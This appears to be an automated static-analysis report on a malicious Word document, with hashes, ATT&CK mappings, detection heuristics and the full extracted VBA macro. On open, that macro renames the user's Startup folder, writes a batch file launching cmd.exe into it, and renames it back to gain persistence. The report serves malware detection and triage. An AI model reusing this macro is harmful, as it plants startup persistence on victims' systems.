Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 32f1b8401beba0d4…

MALICIOUS

Office (OOXML)

18.6 KB Created: 2021-10-25 07:46:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-10-27
MD5: e254ce48326f90836ff2ce24d26c3e36 SHA-1: 83a553f93bd8d455e01845da5d894512b7bb487d SHA-256: 32f1b8401beba0d4eb419c352970055ff9fe20fa20a63bc42f5bc0f309e095cb
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro that executes upon opening the document. This macro uses WScript.Shell to identify the user's startup folder, renames it, creates a batch file named 'test.bat' containing 'cmd.exe' within the renamed folder, and then renames the folder back. This sequence of actions aims to establish persistence by ensuring 'test.bat' executes on system startup.

Heuristics 8

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set objFileSystem = CreateObject("Scripting.FileSystemObject")
OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
NewStartup = Replace(OldStartup, "Startup", "test")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set objFileSystem = CreateObject("Scripting.FileSystemObject")
OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
NewStartup = Replace(OldStartup, "Startup", "test")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Sub Document_Open()
Set objFileSystem = CreateObject("Scripting.FileSystemObject")
OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
     Set objFile = objFSO.CreateTextFile(NewStartup & "\test.bat", True)
 objFile.Write "cmd.exe"
 objFile.Close
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
Set objFileSystem = CreateObject("Scripting.FileSystemObject")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 902 bytes
SHA-256: 816eb58f50bdea41065e2737f2ac350aa459c038c43616ef35d09b4f103d009c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set objFileSystem = CreateObject("Scripting.FileSystemObject")
OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
NewStartup = Replace(OldStartup, "Startup", "test")
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FolderExists(NewStartup) = False Then
 'Rename the original folder
 Name OldStartup As NewStartup
 'Write File to ranmed startup
 Set objFile = objFSO.CreateTextFile(NewStartup & "\test.bat", True)
 objFile.Write "cmd.exe"
 objFile.Close
 'Rename back to original folder name
 Name NewStartup As OldStartup
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 13312 bytes
SHA-256: 2ae471e9cfc0ad0a676c6305799d925a9814f9700885de57c2ecb12db7c0b304

Open this report in the interactive analyzer, or submit your own file for analysis.